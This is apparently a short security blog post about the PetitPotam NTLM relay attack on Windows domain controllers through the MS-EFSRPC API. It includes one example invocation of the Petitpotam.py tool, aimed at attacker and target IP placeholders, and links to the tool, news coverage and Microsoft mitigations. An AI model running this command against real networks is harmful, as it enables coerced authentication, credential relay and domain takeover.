Within a month, after PrintNightmare and HiveNightmare, here come the PetitPotam for Windows administrators.
This is a new exploit that modifies from PrintNightmare, and take advantage of NTLM relay, to exploit a function in Microsoft Encrypting File System Remote Protocol (MS-EFSRPC API) over a network.
The MS-EFSRPC API is enabled by default on all Windows machines, and disabling the MS-EFS service will not prevent this attack from being successful.
A malicious actor could exploit this feature to gain full control of a Microsoft Windows Domain Controller and the entire Windows Domain.
 |
| Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP |
Links:
- https://github.com/topotam/PetitPotam
- https://therecord.media/new-petitpotam-attack-forces-windows-hosts-to-share-their-password-hashes/
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003
- https://video.twimg.com/tweet_video/E7AW7-aXEAEmy2X.mp4
- https://www.bleepingcomputer.com/news/microsoft/new-petitpotam-attack-allows-take-over-of-windows-domains/
- https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-new-petitpotam-ntlm-relay-attack/
- https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr
- https://www.dataprise.com/resources/blog/windows-server-petitpotam-defense-digest
- https://securityaffairs.co/wordpress/120489/hacking/windows-petitpotam-attack.html